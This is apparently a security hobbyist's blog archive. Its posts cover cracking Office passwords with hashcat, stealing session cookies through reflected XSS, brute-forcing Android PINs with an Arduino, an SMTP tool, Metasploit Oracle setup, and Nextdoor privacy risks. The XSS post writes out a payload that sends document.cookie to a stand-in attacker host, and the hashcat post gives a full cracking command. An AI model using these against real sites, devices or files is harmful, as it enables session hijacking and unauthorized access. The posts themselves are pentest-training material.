Wednesday, February 11, 2015

Cracking Password Protected Word, Excel, and Powerpoint Documents

Password cracking a Word document or an Excel file has become much easier.  Previously you had to rely on a flaw in the document, some sketchy software or an even sketchier website. Since October 2014 OclHashcat now supports cracking the documents password.  The process is simple but not as straight forward as a novice might want. You need a couple of things a graphics card capable of cracking using GPU’s, such as an NVidia card with cuda support, OclHashcat version 1.31 or greater, python, and a password protected document.

I’m writing this for Windows because, let’s face it if you lost a password for Word, Excel or Powerpoint you probably have Windows.  First go to grab the correct OclHashcat version for your GPU either AMD or NVidia.  Download it and unzip it, you may need 7zip if you can’t unzip the file. Next, you need python, get that here (I’m not going to say use Python 2.7 or Python3 just grab whatever, I just use 2.7.) Grab the installer, and install it. You also need a python script called office2john and you can get that here office2john. Long story short john the ripper another password cracking suite is also capable of doing this, but I prefer OclHashcat.

Now, we have everything we need to recover that password right? Nope, we need one more thing some dictionaries to use with OclHashcat. Get those from SkullSecurity. You can move on to rule attacks or brute force if the dictionaries fail. One of my first go to lists is the rockyou list start there.

Let’s get cracking, open up a command prompt and navigate to the directory with the file and the password protected file.  Enter:  python FILENAME, filename being the protected document. After a second you will see the output like below:


This is the hash of the password that protects the document, the important part here is highlighted as we need to tell OclHashcat what type of hash this is. This one is an Office 2010 document.  From the command prompt navigate to where you have OclHashcat actually CudaHashcat for me. Entering --help after the cudahashcat32.exe or cudahashcat64.exe will show you the hash type numbers and you pick the one that matches your office version you see in the extracted hash above. 

Since the document is Office 2010 I need hash type 9500. Here is my command

“cudaHashcat32.exe -a 0 -m 9500 --username Book1.xlsx:$office$*2010*100000*128*16*657ca4864bf8f86a617d21cb71b0c572*0d689a95b0e6ddca4c6f0b3b2c30cc46*1b4c305643f3a7da83f0671df10e80e6ed4d6c576129406f79dd6526ca34f153 "D:\password_lists\skullsecurity-lists\skullsecurity-lists\rockyou.txt"

  •         -a 0, specifies dictionary attack mode
  •          -m, is the hash type
  •          --username, tells hashcat to ignore the username in this case the username is “Book1.xlsx”

The next part is the hash followed by the dictionary. Running this will result in the output similar to below.

In the image the hash was cracked in 4 seconds with the password being “Password”.  If that doesn’t work try another dictionary use rules or try to brute force. Keep in mind that a brute force can take a LONG TIME.

Even brute forcing a 6 character password with uppercase, lowercase and numbers can take more than a year. Obviously, the better or more GPU’s you have the faster it will be.  

Long story short:

  • Run to get the hash of the protected document
  • Run OclHashcat on the hash 
  • Open document
See, I told you. easy.

Sunday, August 3, 2014

Refresher Series - Stealing Cookies with XSS

During Capture the Flag (CTF) events or if you are learning to pentest, sometimes you may be posed with the challenge to login to a website without having credentials.  This type of attack requires a few things generally, a website or part of one that is protected, victim, and cross site scripting.  I have also included vulnerable web server code at the bottom of the post, so you can try it yourself.

  1. The attacker finds a webserver vulnerable to XSS 
  2. The user logs into the webserver
  3. The attacker sends  message with a malicious link designed to send the cookie to the attacker
  4. The link is opened and the user unknowingly sends their cookie to the attacker
  5. The attacker is happy as he logs into the webserver

In the example we use reflected XSS, this could be done with stored also the steps would remain the same with the exception of needing to send the message to the user.
Here are the actual steps taking place:

1. Attacker finds a login page and discovers XSS.

Login Page

User input reflected back to the page
Confirmed XSS

2. A user logs into the site to preform normal business, and given a session id.

Valid user login

3. The attacker sends a malicious link in an email or some other means with this type of link which may vary or need to be encoded.<script>var+i+=+new+Image();i.src="http://attackerip/gimmie.html?cookie="+document.cookie</script>&pass=test

Email tricking user to click the malicious link

4. When the link is opened it visits the page and shows an invalid user to the victim. However, in the background it sends a request to the attacker’s site with their cookie included.  Where the attacker has just a simple python web server listening. The incoming request shows the cookie: sessionid and the value of "super_secret_session". 

Incoming session information

5. The attacker then uses their preferred method to get the cookie into their browser such as a plugin like web developers toolbar for Firefox and adds the cookie.

The attacker then simply visits the site and is automatically logged in.

Below you will find the code for the vulnerable web server. Only requirement is python.

Wednesday, January 15, 2014

Brute forcing Android PIN’s with an Arduino and Authentication Weakness

Sticking with the theme this week, I have been bored and haven’t been able to sleep well. I decided to try my hand at brute forcing the PIN on my Samsung Galaxy S3.  Annoyingly enough the Android operating system thought people would do this and after 5 failed attempts you have to wait 30 seconds. Luckily, that doesn't change so automating will be easy. I have seen Hak5’s rubber ducky do this attack as it simply emulates a keyboard. So I decided to try it with my Arduino, and it works just fine.  If you went from 0000 - 9999 that would take roughly 16 hours, the odds are you would get it before then.

I also tried to play with other authentication types on my phone. The most interesting was the pattern type which now forces you to create a backup PIN. If this is set and you can’t get the pattern you can brute force the backup PIN all day and it doesn't have the 30 second delay. After 5 failed swipe attempts you get the option to enter your backup PIN. See the image below. That makes for much faster brute forcing.

The Arduino Sketch below first tries the top 20 PIN’s and then starts its brute force cycle. Yes, it will repeat those 20 eventually but we will try those first, just in case.

For this attack to work you will need an Arduino Leonardo, or an Arduino that can act as a HID (Human Interface Device), an USB OTG (on-the-go) cable and a target device. I always set my HID sketches to work with a switch as I do not want to race the clock trying to upload a new sketch.
In all seriousness this would be a last resort type of thing for me, it’s going to take a long time. I would try to narrow it down somehow, like eliminate the 0 range such as 0000-0999. Do most people start with a zero maybe not?

Finally, the backup PIN brute force in my opinion is a real issue; you could brute force that fairly quickly. 

Tuesday, January 14, 2014

Because I was bored

In my quest to continue to learn more about python I decided to try my hand at making a GUI application. I then thought why not a simple SMTP tool. Why? You ask, honestly some nights are long and boring.   I also wanted to write something cross platform so I chose wxPython. This was nothing more than a see if I can do it type of exercise. It was an experience, and lining things up wasn't fun. The other thing I wanted to do was compile it to an executable which I used PyInstaller. Shockingly because of all the added items with a GUI, the final binary turned out to be 7.5MB that's huge. This was still a fun little tool to build, and I learned a lot doing it. 

The tool is straight forward, simply put in the relevant information and hit OK to send. You will need an email server with open relay to put in to the server and port information. I use Sendmail or Postfix either work just fine. Don’t ask me how to do it, Google It

Here is an image and the code is below. I am not liable for how you use this tool and you are only allowed to use it against targets which you have permission. 

Code Below:

Saturday, August 24, 2013

How to get Oracle support in Metasploit working in Kali Linux.

Getting the Oracle support in Metasploit can be a complete pain, there are a lot of little things that some blogs have right some are missing a step or two and some are just outdated. I couldn't find any information that gave me the complete answers, when I finally figured it out and tested it the setup was quite painless.When it doesn't work the image below is the error you see and even the link shown in the error is outdated. * It's important to point out the module I'm using in these examples is auxiliary/admin/oracle/oracle_login not the the ones in the scanner directory. 

From here you need a few things head over to the following sites and grab these files, on oracle you need to make an account, don’t worry 10 minute mail works for that (make sure you get the 32 or 64 bit for what your system is):

Next, head over to Rubyforge and get the latest version of the oci-8 file. I used 2.1.5 if you deviate from that, you are on your own.* 
Rubyforge is no more as pointed out in the comments, please grab the correct version via Google or

Make a directory in your opt folder called oracle and put all downloaded files in it and unzip them all and follow the steps for the ruby-oci8 file

By simply typing:
  • cd opt/
  • mkdir oracle
  • cd oracle/
  • unzip 
  • unzip
  • unzip
  • mv ruby-oci8-2.1.5.tar.gz  instantclient_10_2/
  • cd instantclient_10_2/
  • ln -s  (if you don’t do this you’ll get an error)
  • tar -zxvf ruby-oci8-2.1.5.tar.gz

Now that that part is done lets add some paths to our .bashrc file.
  • echo "export PATH=$PATH:/opt/oracle/instantclient_10_2" >> /root/.bashrc
  • echo "export SQLPATH=/opt/oracle/instantclient_10_2" >> /root/.bashrc
  • echo "export TNS_ADMIN=/opt/oracle/instantclient_10_2" >> /root/.bashrc
  • echo "export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2" >> /root/.bashrc
  • echo "export ORACLE_HOME=/opt/oracle/instantclient_10_2" >> /root/.bashrc

Also, I have always gotten an error on the LD_LIBRARY path so I just ran when I ran the ruby setup so just do this again but define it like below:
  • export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2
  • cd ruby-oci8-2.1.5/
  • ruby setup.rb config *** see update if this errors out.
  • ruby setup.rb setup
  • ruby setup.rb install

Make sure you restart Metasploit and give it a try, if all works like it should have you should now be able to test Oracle with Metasploit. You can test with just to verify everything is working, you don’t need to have Oracle running to verify it will work.

That's it good luck, and enjoy!

As pointed out in the comment below you may also wish to check with the auxiliary/admin/oracle/oracle_sql module, to verify full functionality. Thanks CG!

Some distros such as Kali 1.08 may need the Ruby dev modules installed before running the ruby setup.rb command.  Simply do an apt-get install ruby-dev before you run it. Thanks to Jagar for pointing out this issue.

Tuesday, April 30, 2013

Your Neighborhood Online, Good or Bad Idea?

I ran across this site, it is another social media site with one difference. “Nextdoor is the private social network for you, your neighbors and your community. It's the easiest way for you and your neighbors to talk online and make all of your lives better in the real world.” The idea is that only people in your real neighborhood can join. Out of curiosity I started looking around the demo site and started to think, this sounds like a terrible idea.

However, in my opinion this starts to go wrong very fast.  A quick Google of site: already starts to produce some interesting results. The first and second page reports results such as the West Briar, Pointe Marin, Covie Hill and Bent Creek. Clicking these links will take you to a login page where you can get a little more information about the neighborhood, such as the city, state and an outlined map of the neighborhood.

Figure 1

Okay, so what’s the risk? First the “bad guys” already know the city, state and the neighborhood. Another quick Google search results in finding an invite page where you enter your address and thanks to the mini map and some more Google it is easy to find an address within the outline.

Figure 2

The next step is an address verification page. The site requires either a credit card for checking the billing address, a mobile number they can call or they can send you a postcard in the mail. I won’t get into the other worries that some of those options might cause, but it looks like they are trying hard to protect the people using the site, but is that enough? And can it be easily circumvented?

What if someone simply gets into a valid account, (we don’t care about how at this moment it happens every day to many sites.) could an attacker use any of the data or information to their advantage. The demo site shows us that there is a lot of information ripe for the picking.

The site is a standard social media site. You have maps, an inbox, events and a neighbor’s button, the exception here is the site really wants your physical data as well and it becomes a data gatherers dream. Clicking on a user shows some useful information, obviously it is up to the user on what to display.  With the data in figure 3 an attacker could start looking to impersonate that person, or use the data to gain access other accounts via password resets or challenge questions like “what is your dog’s name, what is your oldest child’s name”  

Figure 3

As we go deeper into the site we start to see more information that could be valuable or even deadly. The personal risk you accept is huge; one of the best things about the internet is if you’re careful someone finding you in the real world is a little bit challenging.   

Figure 4

This example on the demo site shows a user asking for a baby sitter from 4-10 pm, and other users posting phone numbers to great baby sitters. This of course is incredibly helpful for the person needing the sitter. But, what does it tell the bad guys? Mom or Dad won’t be home from 4-10, the name and number of the babysitter, the kids are older most likely between the ages 7-12. That information could be valuable to any person who wants to use it to their advantage.  Did this home just become a possible target for a personal attack, a robbery, an angry boyfriend of the babysitter, or that creepy person down the street that nobody talks to? 

It is your job to decide if this information is secure, and okay for display to the public. No matter what the claims of privacy there are, assume someone you don’t want seeing this information will see it.  Above all else protect your family and yourself, and maybe just maybe actually go outside and talk to your neighbors. Finally, another important item to consider when signing up for this type of site is: Do they care about security? In looking at the current job posting they are hiring a lot of developers and none of the requirements of any of those posted are for “secure coding practices”.  Hopefully, that is asked during the interview process.

Thursday, February 28, 2013

Gather Sploits: Necessity is the mother of Invention

Ever run into a test where you port scan and you just cannot remember what those ports are or if there is any vulnerabilities connected to them? Normally, I would just take the port do a search on However, I found myself doing that a lot on this last test there were lots of weird ports.   I started by writing a page scraper for Exploit-DB, that took just a list of ports, it was a little slow. I added functionality to search the Exploit-DB CSV file that is in Backtrack or if you have the file just point the script at it. I quickly became annoyed with having to take the ports from my Nmap results and put them into a text file and then run my script.  I then found out there is an API for Exploit-DB so back to the drawing board at the end of the day the Gather Sploits script was born. 

The script simply parses an Nmap xml file grabs the host, ports and OS and runs them through either the Exploit-DB online search or locally if specified. There are some requirements though, you will need a Shodan API key you can get the instructions at You will also need the Shodan python libraries which you can get at Finally, you will need the code at the end of this article and python 2.7.

If the Nmap XML has the operating system (OS) detection in it the script will limit the port findings based on that OS along with the exploits that are for multiple OS’s. You can specify an OS or force all results. This script produces a lot of data, you have been warned. 

Usage is simple

Results are plenty

Code below: